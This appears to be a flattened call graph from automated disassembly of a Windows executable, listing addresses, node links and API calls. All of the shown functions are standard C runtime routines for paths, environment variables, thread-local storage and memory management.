IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15974->15976 15975->15976 15977 7ff7ca7a9a48 _isindst 15976->15977 15980 7ff7ca79b870 15977->15980 15981 7ff7ca79b879 15980->15981 15982 7ff7ca79b884 GetCurrentProcess TerminateProcess 15981->15982 15983 7ff7ca79bc00 IsProcessorFeaturePresent 15981->15983 15984 7ff7ca79bc18 15983->15984 15989 7ff7ca79bdf8 RtlCaptureContext 15984->15989 15990 7ff7ca79be12 RtlLookupFunctionEntry 15989->15990 15991 7ff7ca79bc2b 15990->15991 15992 7ff7ca79be28 RtlVirtualUnwind 15990->15992 15993 7ff7ca79bbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15991->15993 15992->15990 15992->15991 15995 7ff7ca7a4c50 15994->15995 15996 7ff7ca7a4c5d FileTimeToSystemTime 15994->15996 15995->15996 15999 7ff7ca7a4c58 15995->15999 15997 7ff7ca7a4c71 SystemTimeToTzSpecificLocalTime 15996->15997 15996->15999 15997->15999 15998 7ff7ca79b870 _log10_special 8 API calls 16000 7ff7ca7a4b49 15998->16000 15999->15998 16000->15879 16002 7ff7ca7a71a2 16001->16002 16003 7ff7ca7a7134 16001->16003 16038 7ff7ca7afad0 16002->16038 16003->16002 16004 7ff7ca7a7139 16003->16004 16006 7ff7ca7a7151 16004->16006 16007 7ff7ca7a716e 16004->16007 16013 7ff7ca7a6ee8 GetFullPathNameW 16006->16013 16021 7ff7ca7a6f5c GetFullPathNameW 16007->16021 16012 7ff7ca7a7166 __std_exception_copy 16012->15894 16014 7ff7ca7a6f24 16013->16014 16015 7ff7ca7a6f0e GetLastError 16013->16015 16018 7ff7ca7a43f4 _get_daylight 11 API calls 16014->16018 16020 7ff7ca7a6f20 16014->16020 16016 7ff7ca7a4368 _fread_nolock 11 API calls 16015->16016 16017 7ff7ca7a6f1b 16016->16017 16019 7ff7ca7a43f4 _get_daylight 11 API calls 16017->16019 16018->16020 16019->16020 16020->16012 16022 7ff7ca7a6f8f GetLastError 16021->16022 16026 7ff7ca7a6fa5 __std_exception_copy 16021->16026 16023 7ff7ca7a4368 _fread_nolock 11 API calls 16022->16023 16024 7ff7ca7a6f9c 16023->16024 16025 7ff7ca7a43f4 _get_daylight 11 API calls 16024->16025 16027 7ff7ca7a6fa1 16025->16027 16026->16027 16028 7ff7ca7a6fff GetFullPathNameW 16026->16028 16029 7ff7ca7a7034 16027->16029 16028->16022 16028->16027 16030 7ff7ca7a705d __scrt_get_show_window_mode 16029->16030 16034 7ff7ca7a70a8 memcpy_s 16029->16034 16031 7ff7ca7a7091 16030->16031 16030->16034 16035 7ff7ca7a70ca 16030->16035 16032 7ff7ca7a43f4 _get_daylight 11 API calls 16031->16032 16033 7ff7ca7a7096 16032->16033 16036 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16033->16036 16034->16012 16035->16034 16037 7ff7ca7a43f4 _get_daylight 11 API calls 16035->16037 16036->16034 16037->16033 16041 7ff7ca7af8e0 16038->16041 16042 7ff7ca7af922 16041->16042 16043 7ff7ca7af90b 16041->16043 16045 7ff7ca7af926 16042->16045 16046 7ff7ca7af947 16042->16046 16044 7ff7ca7a43f4 _get_daylight 11 API calls 16043->16044 16048 7ff7ca7af910 16044->16048 16067 7ff7ca7afa4c 16045->16067 16079 7ff7ca7ae8c8 16046->16079 16052 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16048->16052 16050 7ff7ca7af94c 16056 7ff7ca7af9f1 16050->16056 16062 7ff7ca7af973 16050->16062 16066 7ff7ca7af91b __std_exception_copy 16052->16066 16053 7ff7ca7af92f 16054 7ff7ca7a43d4 _fread_nolock 11 API calls 16053->16054 16055 7ff7ca7af934 16054->16055 16058 7ff7ca7a43f4 _get_daylight 11 API calls 16055->16058 16056->16043 16059 7ff7ca7af9f9 16056->16059 16057 7ff7ca79b870 _log10_special 8 API calls 16060 7ff7ca7afa41 16057->16060 16058->16048 16061 7ff7ca7a6ee8 13 API calls 16059->16061 16060->16012 16061->16066 16063 7ff7ca7a6f5c 14 API calls 16062->16063 16064 7ff7ca7af9b7 16063->16064 16065 7ff7ca7a7034 37 API calls 16064->16065 16064->16066 16065->16066 16066->16057 16068 7ff7ca7afa96 16067->16068 16069 7ff7ca7afa66 16067->16069 16071 7ff7ca7afaa1 GetDriveTypeW 16068->16071 16072 7ff7ca7afa81 16068->16072 16070 7ff7ca7a43d4 _fread_nolock 11 API calls 16069->16070 16073 7ff7ca7afa6b 16070->16073 16071->16072 16075 7ff7ca79b870 _log10_special 8 API calls 16072->16075 16074 7ff7ca7a43f4 _get_daylight 11 API calls 16073->16074 16076 7ff7ca7afa76 16074->16076 16077 7ff7ca7af92b 16075->16077 16078 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16076->16078 16077->16050 16077->16053 16078->16072 16093 7ff7ca7b97e0 16079->16093 16082 7ff7ca7ae915 16085 7ff7ca79b870 _log10_special 8 API calls 16082->16085 16083 7ff7ca7ae93c 16084 7ff7ca7adea8 _get_daylight 11 API calls 16083->16084 16086 7ff7ca7ae94b 16084->16086 16087 7ff7ca7ae9a9 16085->16087 16088 7ff7ca7ae955 GetCurrentDirectoryW 16086->16088 16089 7ff7ca7ae964 16086->16089 16087->16050 16088->16089 16090 7ff7ca7ae969 16088->16090 16091 7ff7ca7a43f4 _get_daylight 11 API calls 16089->16091 16092 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16090->16092 16091->16090 16092->16082 16094 7ff7ca7ae8fe GetCurrentDirectoryW 16093->16094 16094->16082 16094->16083 16096 7ff7ca7aea41 16095->16096 16097 7ff7ca7aea65 16095->16097 16096->16097 16098 7ff7ca7aea46 16096->16098 16100 7ff7ca7aea9f 16097->16100 16101 7ff7ca7aeabe 16097->16101 16099 7ff7ca7a43f4 _get_daylight 11 API calls 16098->16099 16102 7ff7ca7aea4b 16099->16102 16103 7ff7ca7a43f4 _get_daylight 11 API calls 16100->16103 16112 7ff7ca7a4178 16101->16112 16105 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16102->16105 16106 7ff7ca7aeaa4 16103->16106 16107 7ff7ca7aea56 16105->16107 16108 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16106->16108 16107->15915 16109 7ff7ca7aeaaf 16108->16109 16109->15915 16110 7ff7ca7af7ec 51 API calls 16111 7ff7ca7aeacb 16110->16111 16111->16109 16111->16110 16113 7ff7ca7a419c 16112->16113 16119 7ff7ca7a4197 16112->16119 16113->16119 16120 7ff7ca7aa460 GetLastError 16113->16120 16119->16111 16121 7ff7ca7aa4a1 FlsSetValue 16120->16121 16122 7ff7ca7aa484 FlsGetValue 16120->16122 16124 7ff7ca7aa4b3 16121->16124 16125 7ff7ca7aa491 16121->16125 16123 7ff7ca7aa49b 16122->16123 16122->16125 16123->16121 16127 7ff7ca7adea8 _get_daylight 11 API calls 16124->16127 16126 7ff7ca7aa50d SetLastError 16125->16126 16128 7ff7ca7a41b7 16126->16128 16129 7ff7ca7aa52d 16126->16129 16130 7ff7ca7aa4c2 16127->16130 16142 7ff7ca7acc94 16128->16142 16150 7ff7ca7a9814 16129->16150 16132 7ff7ca7aa4e0 FlsSetValue 16130->16132 16133 7ff7ca7aa4d0 FlsSetValue 16130->16133 16136 7ff7ca7aa4fe 16132->16136 16137 7ff7ca7aa4ec FlsSetValue 16132->16137 16135 7ff7ca7aa4d9 16133->16135 16138 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16135->16138 16139 7ff7ca7aa204 _get_daylight 11 API calls 16136->16139 16137->16135 16138->16125 16140 7ff7ca7aa506 16139->16140 16141 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16140->16141 16141->16126 16143 7ff7ca7a41da 16142->16143 16144 7ff7ca7acca9 16142->16144 16146 7ff7ca7acd00 16143->16146 16144->16143 16194 7ff7ca7b2614 16144->16194 16147 7ff7ca7acd15 16146->16147 16148 7ff7ca7acd28 16146->16148 16147->16148 16207 7ff7ca7b1960 16147->16207 16148->16119 16159 7ff7ca7b2960 16150->16159 16185 7ff7ca7b2918 16159->16185 16190 7ff7ca7af5e8 EnterCriticalSection 16185->16190 16195 7ff7ca7aa460 __GetCurrentState 45 API calls 16194->16195 16196 7ff7ca7b2623 16195->16196 16197 7ff7ca7b266e 16196->16197 16206 7ff7ca7af5e8 EnterCriticalSection 16196->16206 16197->16143 16208 7ff7ca7aa460 __GetCurrentState 45 API calls 16207->16208 16209 7ff7ca7b1969 16208->16209 19713 7ff7ca7aa2e0 19714 7ff7ca7aa2fa 19713->19714 19715 7ff7ca7aa2e5 19713->19715 19719 7ff7ca7aa300 19715->19719 19720 7ff7ca7aa342 19719->19720 19721 7ff7ca7aa34a 19719->19721 19722 7ff7ca7a9c58 __free_lconv_mon 11 API calls 19720->19722 19723 7ff7ca7a9c58 __free_lconv_mon 11 API calls 19721->19723 19722->19721 19724 7ff7ca7aa357 19723->19724 19725 7ff7ca7a9c58 __free_lconv_mon 11 API calls 19724->19725 19726 7ff7ca7aa364 19725->19726 19727 7ff7ca7a9c58 __free_lconv_mon 11 API calls 19726->19727 19728 7ff7ca7aa371 19727->19728 19729 7ff7ca7a9c58 __free_lconv_mon 11 API calls 19728->19729 19730 7ff7ca7aa37e 19729->19730 19731 7ff7ca7a9c58 __free_lconv_mon 11 API calls 19730->19731 19732 7ff7ca7aa38b 19731->19732 19733 7ff7ca7a9c58 __free_lconv_mon 11 API calls 19732->19733 19734 7ff7ca7aa398 19733->19734 19735 7ff7ca7a9c58 __free_lconv_mon 11 API calls 19734->19735 19736 7ff7ca7aa3a5 19735->19736 19737 7ff7ca7a9c58 __free_lconv_mon 11 API calls 19736->19737 19738 7ff7ca7aa3b5 19737->19738 19739 7ff7ca7a9c58 __free_lconv_mon 11 API calls 19738->19739 19740 7ff7ca7aa3c5 19739->19740 19745 7ff7ca7aa1a4 19740->19745 19759 7ff7ca7af5e8 EnterCriticalSection 19745->19759 20020 7ff7ca7a9060 20023 7ff7ca7a8fe4 20020->20023 20030 7ff7ca7af5e8 EnterCriticalSection 20023->20030 16227 7ff7ca7afbd8 16228 7ff7ca7afbfc 16227->16228 16230 7ff7ca7afc0c 16227->16230 16229 7ff7ca7a43f4 _get_daylight 11 API calls 16228->16229 16252 7ff7ca7afc01 16229->16252 16231 7ff7ca7afeec 16230->16231 16232 7ff7ca7afc2e 16230->16232 16233 7ff7ca7a43f4 _get_daylight 11 API calls 16231->16233 16235 7ff7ca7afc4f 16232->16235 16376 7ff7ca7b0294 16232->16376 16234 7ff7ca7afef1 16233->16234 16236 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16234->16236 16238 7ff7ca7afcc1 16235->16238 16240 7ff7ca7afc75 16235->16240 16244 7ff7ca7afcb5 16235->16244 16236->16252 16242 7ff7ca7adea8 _get_daylight 11 API calls 16238->16242 16256 7ff7ca7afc84 16238->16256 16239 7ff7ca7afd6e 16251 7ff7ca7afd8b 16239->16251 16257 7ff7ca7afddd 16239->16257 16391 7ff7ca7a89d8 16240->16391 16245 7ff7ca7afcd7 16242->16245 16244->16239 16244->16256 16397 7ff7ca7b643c 16244->16397 16248 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16245->16248 16247 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16247->16252 16253 7ff7ca7afce5 16248->16253 16249 7ff7ca7afc7f 16254 7ff7ca7a43f4 _get_daylight 11 API calls 16249->16254 16250 7ff7ca7afc9d 16250->16244 16259 7ff7ca7b0294 45 API calls 16250->16259 16255 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16251->16255 16253->16244 16253->16256 16261 7ff7ca7adea8 _get_daylight 11 API calls 16253->16261 16254->16256 16258 7ff7ca7afd94 16255->16258 16256->16247 16257->16256 16260 7ff7ca7b26ec 40 API calls 16257->16260 16268 7ff7ca7afd99 16258->16268 16433 7ff7ca7b26ec 16258->16433 16259->16244 16262 7ff7ca7afe1a 16260->16262 16264 7ff7ca7afd07 16261->16264 16265 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16262->16265 16269 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16264->16269 16270 7ff7ca7afe24 16265->16270 16266 7ff7ca7afdc5 16271 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16266->16271 16267 7ff7ca7afee0 16272 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16267->16272 16268->16267 16273 7ff7ca7adea8 _get_daylight 11 API calls 16268->16273 16269->16244 16270->16256 16270->16268 16271->16268 16272->16252 16274 7ff7ca7afe68 16273->16274 16275 7ff7ca7afe70 16274->16275 16276 7ff7ca7afe79 16274->16276 16277 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16275->16277 16358 7ff7ca7a97b4 16276->16358 16279 7ff7ca7afe77 16277->16279 16284 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16279->16284 16281 7ff7ca7afe90 16442 7ff7ca7b6554 16281->16442 16282 7ff7ca7aff1b 16283 7ff7ca7a9c10 _isindst 17 API calls 16282->16283 16287 7ff7ca7aff2f 16283->16287 16284->16252 16290 7ff7ca7aff58 16287->16290 16297 7ff7ca7aff68 16287->16297 16288 7ff7ca7afeb7 16291 7ff7ca7a43f4 _get_daylight 11 API calls 16288->16291 16289 7ff7ca7afed8 16293 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16289->16293 16292 7ff7ca7a43f4 _get_daylight 11 API calls 16290->16292 16294 7ff7ca7afebc 16291->16294 16295 7ff7ca7aff5d 16292->16295 16293->16267 16296 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16294->16296 16296->16279 16298 7ff7ca7b024b 16297->16298 16299 7ff7ca7aff8a 16297->16299 16300 7ff7ca7a43f4 _get_daylight 11 API calls 16298->16300 16302 7ff7ca7affa7 16299->16302 16461 7ff7ca7b037c 16299->16461 16301 7ff7ca7b0250 16300->16301 16304 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16301->16304 16305 7ff7ca7b001b 16302->16305 16307 7ff7ca7affcf 16302->16307 16314 7ff7ca7b000f 16302->16314 16304->16295 16310 7ff7ca7adea8 _get_daylight 11 API calls 16305->16310 16325 7ff7ca7affde 16305->16325 16328 7ff7ca7b0043 16305->16328 16306 7ff7ca7b00ce 16319 7ff7ca7b00eb 16306->16319 16326 7ff7ca7b013e 16306->16326 16476 7ff7ca7a8a14 16307->16476 16315 7ff7ca7b0035 16310->16315 16312 7ff7ca7adea8 _get_daylight 11 API calls 16318 7ff7ca7b0065 16312->16318 16313 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16313->16295 16314->16306 16314->16325 16482 7ff7ca7b62fc 16314->16482 16320 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16315->16320 16316 7ff7ca7affd9 16321 7ff7ca7a43f4 _get_daylight 11 API calls 16316->16321 16317 7ff7ca7afff7 16317->16314 16324 7ff7ca7b037c 45 API calls 16317->16324 16322 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16318->16322 16323 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16319->16323 16320->16328 16321->16325 16322->16314 16327 7ff7ca7b00f4 16323->16327 16324->16314 16325->16313 16326->16325 16329 7ff7ca7b26ec 40 API calls 16326->16329 16332 7ff7ca7b26ec 40 API calls 16327->16332 16335 7ff7ca7b00fa 16327->16335 16328->16312 16328->16314 16328->16325 16330 7ff7ca7b017c 16329->16330 16331 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16330->16331 16333 7ff7ca7b0186 16331->16333 16336 7ff7ca7b0126 16332->16336 16333->16325 16333->16335 16334 7ff7ca7b023f 16338 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16334->16338 16335->16334 16339 7ff7ca7adea8 _get_daylight 11 API calls 16335->16339 16337 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16336->16337 16337->16335 16338->16295 16340 7ff7ca7b01cb 16339->16340 16341 7ff7ca7b01d3 16340->16341 16342 7ff7ca7b01dc 16340->16342 16343 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16341->16343 16367 7ff7ca7af784 16342->16367 16345 7ff7ca7b01da 16343->16345 16352 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16345->16352 16347 7ff7ca7b01f2 SetEnvironmentVariableW 16349 7ff7ca7b0216 16347->16349 16350 7ff7ca7b0237 16347->16350 16348 7ff7ca7b027f 16351 7ff7ca7a9c10 _isindst 17 API calls 16348->16351 16353 7ff7ca7a43f4 _get_daylight 11 API calls 16349->16353 16355 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16350->16355 16354 7ff7ca7b0293 16351->16354 16352->16295 16356 7ff7ca7b021b 16353->16356 16355->16334 16357 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16356->16357 16357->16345 16359 7ff7ca7a97c1 16358->16359 16360 7ff7ca7a97cb 16358->16360 16359->16360 16365 7ff7ca7a97e6 16359->16365 16361 7ff7ca7a43f4 _get_daylight 11 API calls 16360->16361 16362 7ff7ca7a97d2 16361->16362 16363 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16362->16363 16364 7ff7ca7a97de 16363->16364 16364->16281 16364->16282 16365->16364 16366 7ff7ca7a43f4 _get_daylight 11 API calls 16365->16366 16366->16362 16368 7ff7ca7af791 16367->16368 16369 7ff7ca7af79b 16367->16369 16368->16369 16374 7ff7ca7af7b7 16368->16374 16370 7ff7ca7a43f4 _get_daylight 11 API calls 16369->16370 16371 7ff7ca7af7a3 16370->16371 16372 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16371->16372 16373 7ff7ca7af7af 16372->16373 16373->16347 16373->16348 16374->16373 16375 7ff7ca7a43f4 _get_daylight 11 API calls 16374->16375 16375->16371 16377 7ff7ca7b02b1 16376->16377 16378 7ff7ca7b02c9 16376->16378 16377->16235 16379 7ff7ca7adea8 _get_daylight 11 API calls 16378->16379 16380 7ff7ca7b02ed 16379->16380 16381 7ff7ca7b034e 16380->16381 16385 7ff7ca7adea8 _get_daylight 11 API calls 16380->16385 16386 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16380->16386 16387 7ff7ca7a97b4 __std_exception_copy 37 API calls 16380->16387 16388 7ff7ca7b035d 16380->16388 16390 7ff7ca7b0372 16380->16390 16383 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16381->16383 16382 7ff7ca7a9814 __GetCurrentState 45 API calls 16384 7ff7ca7b0378 16382->16384 16383->16377 16385->16380 16386->16380 16387->16380 16389 7ff7ca7a9c10 _isindst 17 API calls 16388->16389 16389->16390 16390->16382 16392 7ff7ca7a89e8 16391->16392 16395 7ff7ca7a89f1 16391->16395 16392->16395 16506 7ff7ca7a84b0 16392->16506 16395->16249 16395->16250 16398 7ff7ca7b5564 16397->16398 16399 7ff7ca7b6449 16397->16399 16400 7ff7ca7b5571 16398->16400 16407 7ff7ca7b55a7 16398->16407 16401 7ff7ca7a4178 45 API calls 16399->16401 16404 7ff7ca7a43f4 _get_daylight 11 API calls 16400->16404 16408 7ff7ca7b5518 16400->16408 16402 7ff7ca7b647d 16401->16402 16409 7ff7ca7b6493 16402->16409 16413 7ff7ca7b64aa 16402->16413 16428 7ff7ca7b6482 16402->16428 16403 7ff7ca7b55d1 16405 7ff7ca7a43f4 _get_daylight 11 API calls 16403->16405 16406 7ff7ca7b557b 16404->16406 16410 7ff7ca7b55d6 16405->16410 16411 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16406->16411 16407->16403 16412 7ff7ca7b55f6 16407->16412 16408->16244 16415 7ff7ca7a43f4 _get_daylight 11 API calls 16409->16415 16414 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16410->16414 16416 7ff7ca7b5586 16411->16416 16420 7ff7ca7a4178 45 API calls 16412->16420 16425 7ff7ca7b55e1 16412->16425 16418 7ff7ca7b64c6 16413->16418 16419 7ff7ca7b64b4 16413->16419 16414->16425 16417 7ff7ca7b6498 16415->16417 16416->16244 16423 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16417->16423 16421 7ff7ca7b64d7 16418->16421 16422 7ff7ca7b64ee 16418->16422 16424 7ff7ca7a43f4 _get_daylight 11 API calls 16419->16424 16420->16425 16760 7ff7ca7b55b4 16421->16760 16769 7ff7ca7b825c 16422->16769 16423->16428 16429 7ff7ca7b64b9 16424->16429 16425->16244 16428->16244 16431 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16429->16431 16431->16428 16432 7ff7ca7a43f4 _get_daylight 11 API calls 16432->16428 16434 7ff7ca7b270e 16433->16434 16435 7ff7ca7b272b 16433->16435 16434->16435 16437 7ff7ca7b271c 16434->16437 16436 7ff7ca7b2735 16435->16436 16809 7ff7ca7b6f48 16435->16809 16816 7ff7ca7b6f84 16436->16816 16439 7ff7ca7a43f4 _get_daylight 11 API calls 16437->16439 16441 7ff7ca7b2721 __scrt_get_show_window_mode 16439->16441 16441->16266 16443 7ff7ca7a4178 45 API calls 16442->16443 16444 7ff7ca7b65ba 16443->16444 16445 7ff7ca7b65c8 16444->16445 16828 7ff7ca7ae234 16444->16828 16831 7ff7ca7a47bc 16445->16831 16449 7ff7ca7b66b4 16452 7ff7ca7b66c5 16449->16452 16453 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16449->16453 16450 7ff7ca7a4178 45 API calls 16451 7ff7ca7b6637 16450->16451 16455 7ff7ca7ae234 5 API calls 16451->16455 16458 7ff7ca7b6640 16451->16458 16454 7ff7ca7afeb3 16452->16454 16456 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16452->16456 16453->16452 16454->16288 16454->16289 16455->16458 16456->16454 16457 7ff7ca7a47bc 14 API calls 16459 7ff7ca7b669b 16457->16459 16458->16457 16459->16449 16460 7ff7ca7b66a3 SetEnvironmentVariableW 16459->16460 16460->16449 16462 7ff7ca7b03bc 16461->16462 16468 7ff7ca7b039f 16461->16468 16463 7ff7ca7adea8 _get_daylight 11 API calls 16462->16463 16471 7ff7ca7b03e0 16463->16471 16464 7ff7ca7b0441 16467 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16464->16467 16465 7ff7ca7a9814 __GetCurrentState 45 API calls 16466 7ff7ca7b046a 16465->16466 16467->16468 16468->16302 16469 7ff7ca7adea8 _get_daylight 11 API calls 16469->16471 16470 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16470->16471 16471->16464 16471->16469 16471->16470 16472 7ff7ca7af784 37 API calls 16471->16472 16473 7ff7ca7b0450 16471->16473 16475 7ff7ca7b0464 16471->16475 16472->16471 16474 7ff7ca7a9c10 _isindst 17 API calls 16473->16474 16474->16475 16475->16465 16477 7ff7ca7a8a24 16476->16477 16480 7ff7ca7a8a2d 16476->16480 16477->16480 16853 7ff7ca7a8524 16477->16853 16480->16316 16480->16317 16483 7ff7ca7b6309 16482->16483 16486 7ff7ca7b6336 16482->16486 16484 7ff7ca7b630e 16483->16484 16483->16486 16485 7ff7ca7a43f4 _get_daylight 11 API calls 16484->16485 16488 7ff7ca7b6313 16485->16488 16487 7ff7ca7b637a 16486->16487 16490 7ff7ca7b6399 16486->16490 16503 7ff7ca7b636e __crtLCMapStringW 16486->16503 16489 7ff7ca7a43f4 _get_daylight 11 API calls 16487->16489 16491 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16488->16491 16492 7ff7ca7b637f 16489->16492 16493 7ff7ca7b63b5 16490->16493 16494 7ff7ca7b63a3 16490->16494 16495 7ff7ca7b631e 16491->16495 16496 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16492->16496 16498 7ff7ca7a4178 45 API calls 16493->16498 16497 7ff7ca7a43f4 _get_daylight 11 API calls 16494->16497 16495->16314 16496->16503 16499 7ff7ca7b63a8 16497->16499 16500 7ff7ca7b63c2 16498->16500 16501 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16499->16501 16500->16503 16900 7ff7ca7b7e18 16500->16900 16501->16503 16503->16314 16505 7ff7ca7a43f4 _get_daylight 11 API calls 16505->16503 16507 7ff7ca7a84c5 16506->16507 16508 7ff7ca7a84c9 16506->16508 16507->16395 16521 7ff7ca7a8804 16507->16521 16529 7ff7ca7b1900 16508->16529 16513 7ff7ca7a84e7 16555 7ff7ca7a8594 16513->16555 16514 7ff7ca7a84db 16515 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16514->16515 16515->16507 16518 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16519 7ff7ca7a850e 16518->16519 16520 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16519->16520 16520->16507 16522 7ff7ca7a882d 16521->16522 16523 7ff7ca7a8846 16521->16523 16522->16395 16523->16522 16524 7ff7ca7adea8 _get_daylight 11 API calls 16523->16524 16525 7ff7ca7a88d6 16523->16525 16526 7ff7ca7afaf8 WideCharToMultiByte 16523->16526 16528 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16523->16528 16524->16523 16527 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16525->16527 16526->16523 16527->16522 16528->16523 16530 7ff7ca7a84ce 16529->16530 16531 7ff7ca7b190d 16529->16531 16535 7ff7ca7b1c3c GetEnvironmentStringsW 16530->16535 16574 7ff7ca7aa534 16531->16574 16536 7ff7ca7a84d3 16535->16536 16537 7ff7ca7b1c6c 16535->16537 16536->16513 16536->16514 16538 7ff7ca7afaf8 WideCharToMultiByte 16537->16538 16539 7ff7ca7b1cbd 16538->16539 16540 7ff7ca7b1cc4 FreeEnvironmentStringsW 16539->16540 16541 7ff7ca7ac90c _fread_nolock 12 API calls 16539->16541 16540->16536 16542 7ff7ca7b1cd7 16541->16542 16543 7ff7ca7b1cdf 16542->16543 16544 7ff7ca7b1ce8 16542->16544 16546 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16543->16546 16545 7ff7ca7afaf8 WideCharToMultiByte 16544->16545 16547 7ff7ca7b1d0b 16545->16547 16548 7ff7ca7b1ce6 16546->16548 16549 7ff7ca7b1d0f 16547->16549 16550 7ff7ca7b1d19 16547->16550 16548->16540 16551 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16549->16551 16552 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16550->16552 16553 7ff7ca7b1d17 FreeEnvironmentStringsW 16551->16553 16552->16553 16553->16536 16556 7ff7ca7a85b9 16555->16556 16557 7ff7ca7adea8 _get_daylight 11 API calls 16556->16557 16568 7ff7ca7a85ef 16557->16568 16558 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16559 7ff7ca7a84ef 16558->16559 16559->16518 16560 7ff7ca7a866a 16561 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16560->16561 16561->16559 16562 7ff7ca7adea8 _get_daylight 11 API calls 16562->16568 16563 7ff7ca7a8659 16754 7ff7ca7a87c0 16563->16754 16564 7ff7ca7a97b4 __std_exception_copy 37 API calls 16564->16568 16567 7ff7ca7a868f 16572 7ff7ca7a9c10 _isindst 17 API calls 16567->16572 16568->16560 16568->16562 16568->16563 16568->16564 16568->16567 16570 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16568->16570 16571 7ff7ca7a85f7 16568->16571 16569 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16569->16571 16570->16568 16571->16558 16573 7ff7ca7a86a2 16572->16573 16575 7ff7ca7aa560 FlsSetValue 16574->16575 16576 7ff7ca7aa545 FlsGetValue 16574->16576 16577 7ff7ca7aa552 16575->16577 16579 7ff7ca7aa56d 16575->16579 16576->16577 16578 7ff7ca7aa55a 16576->16578 16580 7ff7ca7aa558 16577->16580 16581 7ff7ca7a9814 __GetCurrentState 45 API calls 16577->16581 16578->16575 16582 7ff7ca7adea8 _get_daylight 11 API calls 16579->16582 16594 7ff7ca7b15d4 16580->16594 16583 7ff7ca7aa5d5 16581->16583 16584 7ff7ca7aa57c 16582->16584 16585 7ff7ca7aa59a FlsSetValue 16584->16585 16586 7ff7ca7aa58a FlsSetValue 16584->16586 16587 7ff7ca7aa5a6 FlsSetValue 16585->16587 16588 7ff7ca7aa5b8 16585->16588 16589 7ff7ca7aa593 16586->16589 16587->16589 16590 7ff7ca7aa204 _get_daylight 11 API calls 16588->16590 16591 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16589->16591 16592 7ff7ca7aa5c0 16590->16592 16591->16577 16593 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16592->16593 16593->16580 16617 7ff7ca7b1844 16594->16617 16596 7ff7ca7b1609 16632 7ff7ca7b12d4 16596->16632 16599 7ff7ca7b1626 16599->16530 16600 7ff7ca7ac90c _fread_nolock 12 API calls 16601 7ff7ca7b1637 16600->16601 16602 7ff7ca7b163f 16601->16602 16604 7ff7ca7b164e 16601->16604 16603 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16602->16603 16603->16599 16604->16604 16639 7ff7ca7b197c 16604->16639 16607 7ff7ca7b174a 16608 7ff7ca7a43f4 _get_daylight 11 API calls 16607->16608 16609 7ff7ca7b174f 16608->16609 16611 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16609->16611 16610 7ff7ca7b17a5 16613 7ff7ca7b180c 16610->16613 16650 7ff7ca7b1104 16610->16650 16611->16599 16612 7ff7ca7b1764 16612->16610 16615 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16612->16615 16614 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16613->16614 16614->16599 16615->16610 16618 7ff7ca7b1867 16617->16618 16619 7ff7ca7b1871 16618->16619 16665 7ff7ca7af5e8 EnterCriticalSection 16618->16665 16622 7ff7ca7b18e3 16619->16622 16625 7ff7ca7a9814 __GetCurrentState 45 API calls 16619->16625 16622->16596 16626 7ff7ca7b18fb 16625->16626 16628 